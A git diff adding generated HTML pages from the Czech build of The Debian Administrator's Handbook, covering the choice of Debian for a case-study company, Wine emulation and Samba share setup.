+                class="listitem"><div
+                  class="para">
+						Finally, Debian is available on a multitude of architectures, including ppc64el for OpenPOWER processors; it will, thus, be possible to install it on Falcot Corp's latest IBM servers.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Debian Long Term Support</strong></p></div></div></div><div
+              class="para">
+				The Debian Long Term Support (LTS) project started in 2014 and aims to provide 5 years of security support to all stable Debian releases. As LTS is of primary importance to organizations with large deployments, the project tries to pool resources from Debian-using companies. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS">https://wiki.debian.org/LTS</a></div>
+			</div><div
+              class="para">
+				Falcot Corp is not big enough to let one member of its IT staff contribute to the LTS project, so the company opted to subscribe to Freexian's Debian LTS contract and provides financial support. Thanks to this, the Falcot administrators know that the packages they use will be handled in priority and they have a direct contact with the LTS team in case of problems. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS/Funding">https://wiki.debian.org/LTS/Funding</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.freexian.com/services/debian-lts.html">https://www.freexian.com/services/debian-lts.html</a></div>
+			</div></div><div
+            class="para">
+				Once Debian has been chosen, the matter of which version to use must be decided. Let us see why the administrators have picked Debian Stretch.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-gnu-linux.html"><strong>Předcházející</strong>2.3. Why a GNU/Linux Distribution?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian-stable.html"><strong>Další</strong>2.5. Why Debian Stretch?</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.why-gnu-linux.html b/tmp/cs-CZ/html/sect.why-gnu-linux.html
new file mode 100644
index 000000000..e7cfe6d21
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.why-gnu-linux.html
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.3. Why a GNU/Linux Distribution?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.master-plan.html"
+        title="2.2. Master Plan" /><link
+        rel="next"
+        href="sect.why-debian.html"
+        title="2.4. Why the Debian Distribution?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-gnu-linux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.master-plan.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-gnu-linux"></a>2.3. Why a GNU/Linux Distribution?</h2></div></div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Linux or GNU/Linux?</strong></p></div></div></div><a
+            id="id-1.5.7.2.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.2.3"
+            class="indexterm"></a><div
+            class="para">
+			Linux, as you already know, is only a kernel. The expressions, “Linux distribution” and “Linux system” are, thus, incorrect: they are, in reality, distributions or systems <span
+              class="emphasis"><em>based on</em></span> Linux. These expressions fail to mention the software that always completes this kernel, among which are the programs developed by the GNU Project. Dr. Richard Stallman, founder of this project, insists that the expression “GNU/Linux” be systematically used, in order to better recognize the important contributions made by the GNU Project and the principles of freedom upon which they are founded.
+		</div><div
+            class="para">
+			Debian has chosen to follow this recommendation, and, thus, name its distributions accordingly (thus, the latest stable release is Debian GNU/Linux 9).
+		</div></div><div
+          class="para">
+			Several factors have dictated this choice. The system administrator, who was familiar with this distribution, ensured it was listed among the candidates for the computer system overhaul. Difficult economic conditions and ferocious competition have limited the budget for this operation, despite its critical importance for the future of the company. This is why Open Source solutions were swiftly chosen: several recent studies indicate they are less expensive than proprietary solutions while providing equal or better quality of service so long as qualified personnel are available to run them.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Total cost of ownership (TCO)</strong></p></div></div></div><a
+            id="id-1.5.7.4.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.4.3"
+            class="indexterm"></a><div
+            class="para">
+			The Total Cost of Ownership is the total of all money expended for the possession or acquisition of an item, in this case referring to the operating system. This price includes any possible license fee, costs for training personnel to work with the new software, replacement of machines that are too slow, additional repairs, etc. Everything arising directly from the initial choice is taken into account.
+		</div><div
+            class="para">
+			This TCO, which varies according to the criteria chosen in the assessment thereof, is rarely significant when taken in isolation. However, it is very interesting to compare TCOs for different options if they are calculated according to the same rules. This assessment table is, thus, of paramount importance, and it is easy to manipulate it in order to draw a predefined conclusion. Thus, the TCO for a single machine doesn't make sense, since the cost of an administrator is also reflected in the total number of machines they manage, a number which obviously depends on the operating system and tools proposed.
+		</div></div><div
+          class="para">
+			Among free operating systems, the IT department looked at the free BSD systems (OpenBSD, FreeBSD, and NetBSD), GNU Hurd, and Linux distributions. GNU Hurd, which has not yet released a stable version, was immediately rejected. The choice is simpler between BSD and Linux. The former have many merits, especially on servers. Pragmatism, however, led to choosing a Linux system, since its installed base and popularity are both very significant and have many positive consequences. One of these consequences is that it is easier to find qualified personnel to administer Linux machines than technicians experienced with BSD. Furthermore, Linux adapts to newer hardware faster than BSD (although they are often neck and neck in this race). Finally, Linux distributions are often more adapted to user-friendly graphical user interfaces, indispensable for beginners during migration of all office machines to a new system.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Debian GNU/kFreeBSD</strong></p></div></div></div><a
+            id="id-1.5.7.6.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.6.3"
+            class="indexterm"></a><a
+            id="id-1.5.7.6.4"
+            class="indexterm"></a><div
+            class="para">
+			Since Debian 6 <span
+              class="distribution distribution">Squeeze</span>, it is possible to use Debian with a FreeBSD kernel on 32 and 64 bit computers; this is what the <code
+              class="literal">kfreebsd-i386</code> and <code
+              class="literal">kfreebsd-amd64</code> architectures mean. While these architectures are not “official release architectures”, about 90 % of the software packaged by Debian is available for them.
+		</div><div
+            class="para">
+			These architectures may be an appropriate choice for Falcot Corp administrators, especially for a firewall (the kernel supports three different firewalls: IPF, IPFW, PF) or for a NAS (network attached storage system, for which the ZFS filesystem has been tested and approved).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.master-plan.html"><strong>Předcházející</strong>2.2. Master Plan</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian.html"><strong>Další</strong>2.4. Why the Debian Distribution?</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.windows-emulation.html b/tmp/cs-CZ/html/sect.windows-emulation.html
new file mode 100644
index 000000000..6b113a579
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.windows-emulation.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.9. Emulating Windows: Wine</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.office-suites.html"
+        title="13.8. Office Suites" /><link
+        rel="next"
+        href="sect.rtc-clients.html"
+        title="13.10. Real-Time Communications software" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.windows-emulation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.office-suites.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-clients.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.windows-emulation"></a>13.9. Emulating Windows: Wine</h2></div></div></div><a
+          id="id-1.16.12.2"
+          class="indexterm"></a><a
+          id="id-1.16.12.3"
+          class="indexterm"></a><div
+          class="para">
+			In spite of all the previously mentioned efforts, there are still a number of tools without a Linux equivalent, or for which the original version is absolutely required. This is where Windows emulation systems come in handy. The most well-known among them is Wine. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://www.winehq.org/">https://www.winehq.org/</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMPLEMENTS</em></span> CrossOver Linux</strong></p></div></div></div><div
+            class="para">
+			<span
+              class="emphasis"><em>CrossOver</em></span>, produced by CodeWeavers, is a set of enhancements to Wine that broadens the available set of emulated features to a point at which Microsoft Office becomes fully usable. Some of the enhancements are periodically merged into Wine. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.codeweavers.com/products/">https://www.codeweavers.com/products/</a></div>
+		</div><a
+            id="id-1.16.12.5.3"
+            class="indexterm"></a><a
+            id="id-1.16.12.5.4"
+            class="indexterm"></a></div><div
+          class="para">
+			However, one should keep in mind that it is only a solution among others, and the problem can also be tackled with a virtual machine or VNC; both of these solutions are detailed in the sidebars <a
+            class="xref"
+            href="sect.windows-emulation.html#sidebar.virtual-machines"><span
+              class="emphasis"><em>ALTERNATIVE</em></span> Virtual machines</a> and <a
+            class="xref"
+            href="sect.windows-emulation.html#sidebar.wts-or-vnc"><span
+              class="emphasis"><em>ALTERNATIVE</em></span> <span
+              class="foreignphrase"><em
+                class="foreignphrase">Windows Terminal Server</em></span> or VNC</a>.
+		</div><div
+          class="para">
+			Let us start with a reminder: emulation allows executing a program (developed for a target system) on a different host system. The emulation software uses the host system, where the application runs, to imitate the required features of the target system.
+		</div><a
+          id="id-1.16.12.8"
+          class="indexterm"></a><div
+          class="para">
+			Now let's install the required packages (<span
+            class="pkg pkg">ttf-mscorefonts-installer</span> is in the contrib section):
+		</div><pre
+          class="screen">
+<code
+            class="computeroutput"># </code><strong
+            class="userinput"><code>apt install wine ttf-mscorefonts-installer</code></strong></pre><a
+          id="id-1.16.12.11"
+          class="indexterm"></a><div
+          class="para">
+			On a 64 bit (amd64) system, if your Windows applications are 32 bit applications, then you will have to enable multi-arch to be able to install wine32 from the i386 architecture (see <a
+            class="xref"
+            href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5 – „Multi-Arch Support“</a>).
+		</div><div
+          class="para">
+			The user then needs to run <code
+            class="command">winecfg</code> and configure which (Debian) locations are mapped to which (Windows) drives. <code
+            class="command">winecfg</code> has some sane defaults and can autodetect some more drives; note that even if you have a dual-boot system, you should not point the <code
+            class="literal">C:</code> drive at where the Windows partition is mounted in Debian, as Wine is likely to overwrite some of the data on that partition, making Windows unusable. Other settings can be kept to their default values. To run Windows programs, you will first need to install them by running their (Windows) installer under Wine, with a command such as <code
+            class="command">wine <em
+              class="replaceable">.../setup.exe</em></code>; once the program is installed, you can run it with <code
+            class="command">wine <em
+              class="replaceable">.../program.exe</em></code>. The exact location of the <code
+            class="filename">program.exe</code> file depends on where the <code
+            class="literal">C:</code> drive is mapped; in many cases, however, simply running <code
+            class="command">wine <em
+              class="replaceable">program</em></code> will work, since the program is usually installed in a location where Wine will look for it by itself.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Working around a winecfg failure</strong></p></div></div></div><div
+            class="para">
+			In some cases, <code
+              class="command">winecfg</code> (which is just a wrapper) might fail. As a work-around, it is possible to try to run the underlying command manually: <code
+              class="command">wine64 /usr/lib/x86_64-linux-gnu/wine/wine/winecfg.exe.so</code> or <code
+              class="command">wine32 /usr/lib/i386-linux-gnu/wine/wine/winecfg.exe.so</code>.
+		</div></div><div
+          class="para">
+			Note that you should not rely on Wine (or similar solutions) without actually testing the particular software: only a real-use test will determine conclusively whether emulation is fully functional.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.virtual-machines"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Virtual machines</strong></p></div></div></div><div
+            class="para">
+			An alternative to emulating Microsoft's operating system is to actually run it in a virtual machine that emulates a full hardware machine. This allows running any operating system. <a
+              class="xref"
+              href="advanced-administration.html">12 – „<em>Advanced Administration</em>“</a> describes several virtualization systems, most notably Xen and KVM (but also QEMU, VMWare and Bochs).
+		</div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.wts-or-vnc"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <span
+                      class="foreignphrase"><em
+                        class="foreignphrase">Windows Terminal Server</em></span> or VNC</strong></p></div></div></div><div
+            class="para">
+			Yet another possibility is to remotely run the legacy Windows applications on a central server with <span
+              class="emphasis"><em>Windows Terminal Server</em></span> and access the application from Linux machines using <span
+              class="emphasis"><em>rdesktop</em></span>. This is a Linux client for the RDP protocol (<span
+              class="emphasis"><em>Remote Desktop Protocol</em></span>) that <span
+              class="foreignphrase"><em
+                class="foreignphrase">Windows NT/2000 Terminal Server</em></span> uses to display desktops on remote machines.
+		</div><a
+            id="id-1.16.12.17.3"
+            class="indexterm"></a><a
+            id="id-1.16.12.17.4"
+            class="indexterm"></a><a
+            id="id-1.16.12.17.5"
+            class="indexterm"></a><div
+            class="para">
+			The VNC software provides similar features, with the added benefit of also working with many operating systems. Linux VNC clients and servers are described in <a
+              class="xref"
+              href="sect.remote-login.html">9.2 – „Remote Login“</a>.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.office-suites.html"><strong>Předcházející</strong>13.8. Office Suites</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-clients.html"><strong>Další</strong>13.10. Real-Time Communications software</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.windows-file-server-with-samba.html b/tmp/cs-CZ/html/sect.windows-file-server-with-samba.html
new file mode 100644
index 000000000..1cadb27dd
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.windows-file-server-with-samba.html
@@ -0,0 +1,399 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.5. Setting Up Windows Shares with Samba</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.nfs-file-server.html"
+        title="11.4. NFS File Server" /><link
+        rel="next"
+        href="sect.http-ftp-proxy.html"
+        title="11.6. HTTP/FTP Proxy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.windows-file-server-with-samba.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.nfs-file-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-ftp-proxy.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.windows-file-server-with-samba"></a>11.5. Setting Up Windows Shares with Samba</h2></div></div></div><div
+          class="para">
+			Samba is a suite of tools handling the SMB protocol (also known as “CIFS”) on Linux. This protocol is used by Windows for network shares and shared printers.
+		</div><a
+          id="id-1.14.8.3"
+          class="indexterm"></a><a
+          id="id-1.14.8.4"
+          class="indexterm"></a><a
+          id="id-1.14.8.5"
+          class="indexterm"></a><a
+          id="id-1.14.8.6"
+          class="indexterm"></a><a
+          id="id-1.14.8.7"
+          class="indexterm"></a><div
+          class="para">
+			Samba can also act as an Windows domain controller. This is an outstanding tool for ensuring seamless integration of Linux servers and the office desktop machines still running Windows.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.8.9"></a>11.5.1. Samba Server</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">samba</span> package contains the main two servers of Samba 4, <code
+              class="command">smbd</code> and <code
+              class="command">nmbd</code>.
+			</div><a
+            id="id-1.14.8.9.3"
+            class="indexterm"></a><a
+            id="id-1.14.8.9.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> Going further</strong></p></div></div></div><div
+              class="para">
+				The Samba server is extremely configurable and versatile, and can address a great many different use cases matching very different requirements and network architectures. This book only focuses on the use case where Samba is used as a standalone server, but it can also be a NT4 Domain Controller or a full Active Directory Domain Controller, or a simple member of an existing domain (which could be a managed by a Windows server).
+			</div><a
+              id="id-1.14.8.9.5.3"
+              class="indexterm"></a><a
+              id="id-1.14.8.9.5.4"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="pkg pkg">samba-doc</span> package contains a wealth of commented example files in <code
+                class="filename">/usr/share/doc/samba-doc/examples/</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Authenticating with a Windows Server</strong></p></div></div></div><div
+              class="para">
+				Winbind gives system administrators the option of using a Windows server as an authentication server. Winbind also integrates cleanly with PAM and NSS. This allows setting up Linux machines where all users of a Windows domain automatically get an account.
+			</div><a
+              id="id-1.14.8.9.6.3"
+              class="indexterm"></a><div
+              class="para">
+				More information can be found in the <code
+                class="filename">/usr/share/doc/samba-doc/examples/pam_winbind/</code> directory.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.9.7"></a>11.5.1.1. Configuring with <code
+                      class="command">debconf</code></h4></div></div></div><div
+              class="para">
+					The package sets up a minimal configuration during the initial installation but you should really run <code
+                class="command">dpkg-reconfigure samba-common</code> to adapt it:
+				</div><div
+              class="para">
+					The first piece of required information is the name of the workgroup where the Samba server will belong (the answer is <code
+                class="literal">FALCOTNET</code> in our case).
+				</div><div
+              class="para">
+					The package also proposes identifying the WINS server from the information provided by the DHCP daemon. The Falcot Corp administrators rejected this option, since they intend to use the Samba server itself as the WINS server.
+				</div><a
+              id="id-1.14.8.9.7.5"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.9.8"></a>11.5.1.2. Configuring Manually</h4></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.8.9.8.2"></a>11.5.1.2.1. Changes to <code
+                        class="filename">smb.conf</code></h5></div></div></div><div
+                class="para">
+						The requirements at Falcot require other options to be modified in the <code
+                  class="filename">/etc/samba/smb.conf</code> configuration file. The following excerpts summarize the changes that were effected in the <code
+                  class="literal">[global]</code> section.
+					</div><pre
+                class="programlisting">
+[global]
+
+## Browsing/Identification ###
+
+# Change this to the workgroup/NT-domain name your Samba server will part of
+   workgroup = FALCOTNET
+
+# Windows Internet Name Serving Support Section:
+# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
+   wins support = yes <span
+                  id="smb.conf.wins"><img
+                    class="callout"
+                    src="Common_Content/images/1.png"
+                    alt="1" /></span>
+
+[...]
+
+####### Authentication #######
+
+# Server role. Defines in which mode Samba will operate. Possible
+# values are "standalone server", "member server", "classic primary
+# domain controller", "classic backup domain controller", "active
+# directory domain controller". 
+#
+# Most people will want "standalone sever" or "member server".
+# Running as "active directory domain controller" will require first
+# running "samba-tool domain provision" to wipe databases and create a
+# new domain.
+   server role = standalone server
+
+# "security = user" is always a good idea. This will require a Unix account
+# in this server for every user accessing the server.
+   security = user <span
+                  id="smb.conf.security"><img
+                    class="callout"
+                    src="Common_Content/images/2.png"
+                    alt="2" /></span>
+
+[...]
+</pre><div
+                class="calloutlist"><table
+                  border="0"
+                  summary="Callout list"><tr><td
+                      width="5%"
+                      valign="top"
+                      align="left"><p><a
+                          href="#smb.conf.wins"><img
+                            class="callout"
+                            src="Common_Content/images/1.png"
+                            alt="1" /></a> </p></td><td
+                      valign="top"
+                      align="left"><div
+                        class="para">
+								Indicates that Samba should act as a Netbios name server (WINS) for the local network.
+							</div></td></tr><tr><td
+                      width="5%"
+                      valign="top"
+                      align="left"><p><a
+                          href="#smb.conf.security"><img
+                            class="callout"
+                            src="Common_Content/images/2.png"
+                            alt="2" /></a> </p></td><td
+                      valign="top"
+                      align="left"><div
+                        class="para">
+								This is the default value for this parameter; however, since it is central to the Samba configuration, filling it explicitly is recommended. Each user must authenticate before accessing any share.
+							</div></td></tr></table></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.8.9.8.3"></a>11.5.1.2.2. Adding Users</h5></div></div></div><div
+                class="para">
+						Each Samba user needs an account on the server; the Unix accounts must be created first, then the user needs to be registered in Samba's database. The Unix step is done quite normally (using <code
+                  class="command">adduser</code> for instance).
+					</div><div
+                class="para">
+						Adding an existing user to the Samba database is a matter of running the <code
+                  class="command">smbpasswd -a <em
+                    class="replaceable">user</em></code> command; this command asks for the password interactively.
+					</div><div
+                class="para">
+						A user can be deleted with the <code
+                  class="command">smbpasswd -x <em
+                    class="replaceable">user</em></code> command. A Samba account can also be temporarily disabled (with <code
+                  class="command">smbpasswd -d <em
+                    class="replaceable">user</em></code>) and re-enabled later (with <code
+                  class="command">smbpasswd -e <em
+                    class="replaceable">user</em></code>).
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.8.10"></a>11.5.2. Samba Client</h3></div></div></div><div
+            class="para">
+				The client features in Samba allow a Linux machine to access Windows shares and shared printers. The required programs are available in the <span
+              class="pkg pkg">cifs-utils</span> and <span
+              class="pkg pkg">smbclient</span> packages.
+			</div><a
+            id="id-1.14.8.10.3"
+            class="indexterm"></a><a
+            id="id-1.14.8.10.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.5"></a>11.5.2.1. The <code
+                      class="command">smbclient</code> Program</h4></div></div></div><div
+              class="para">
+					The <code
+                class="command">smbclient</code> program queries SMB servers. It accepts a <code
+                class="literal">-U <em
+                  class="replaceable">user</em></code> option, for connecting to the server under a specific identity. <code
+                class="command">smbclient //<em
+                  class="replaceable">server</em>/<em
+                  class="replaceable">share</em></code> accesses the share in an interactive way similar to the command-line FTP client. <code
+                class="command">smbclient -L <em
+                  class="replaceable">server</em></code> lists all available (and visible) shares on a server.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.6"></a>11.5.2.2. Mounting Windows Shares</h4></div></div></div><div
+              class="para">
+					The <code
+                class="command">mount</code> command allows mounting a Windows share into the Linux filesystem hierarchy (with the help of <code
+                class="command">mount.cifs</code> provided by <span
+                class="pkg pkg">cifs-utils</span>).
+				</div><a
+              id="id-1.14.8.10.6.3"
+              class="indexterm"></a><a
+              id="id-1.14.8.10.6.4"
+              class="indexterm"></a><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.8.10.6.5"></a><p
+                class="title"><strong>Příklad 11.24. Mounting a Windows share</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+mount -t cifs //arrakis/shared /shared \
+      -o credentials=/etc/smb-credentials
+</pre></div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/smb-credentials</code> file (which must not be readable by users) has the following format:
+				</div><pre
+              class="programlisting">
+username = <em
+                class="replaceable">user</em>
+password = <em
+                class="replaceable">password</em></pre><div
+              class="para">
+					Other options can be specified on the command-line; their full list is available in the <span
+                class="citerefentry"><span
+                  class="refentrytitle">mount.cifs</span>(1)</span> manual page. Two options in particular can be interesting: <code
+                class="literal">uid</code> and <code
+                class="literal">gid</code> allow forcing the owner and group of files available on the mount, so as not to restrict access to root.
+				</div><div
+              class="para">
+					A mount of a Windows share can also be configured in <code
+                class="filename">/etc/fstab</code>:
+				</div><pre
+              class="programlisting">
+//<em
+                class="replaceable">server</em>/shared /shared cifs credentials=/etc/smb-credentials
+</pre><div
+              class="para">
+					Unmounting a SMB/CIFS share is done with the standard <code
+                class="command">umount</code> command.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.7"></a>11.5.2.3. Printing on a Shared Printer</h4></div></div></div><div
+              class="para">
